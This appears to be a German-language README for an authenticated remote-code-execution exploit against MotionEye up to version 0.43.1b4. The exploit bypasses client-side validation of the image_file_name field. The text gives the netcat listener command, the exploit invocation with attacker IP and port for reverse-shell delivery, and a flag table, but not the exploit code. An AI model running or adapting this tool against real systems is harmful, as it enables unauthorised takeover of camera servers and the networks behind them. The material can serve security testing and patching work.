
Authentifizierter RCE-Exploit für MotionEye <= 0.43.1b4 über Umgehung der clientseitigen Validierung im Feld image_file_name. Enthält Reverse-Shell-Payload-Übermittlung.
Authentifizierte RCE in MotionEye <= 0.43.1b4 durch Umgehung der clientseitigen Validierung im Feld image_file_name.
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| Flag | Beschreibung |
|---|---|
-t | Zielhost/URL (Standard: Port 8765) |
-u | Benutzername (Standard: admin) |
-p | Passwort – derselbe Wert, den Sie im GUI eingeben / in motion.conf finden |
-lh | Ihre Angreifer-IP |
-lp | Port des Listeners |
--camera-id | Kamera-ID (wird automatisch erkannt, falls weggelassen) |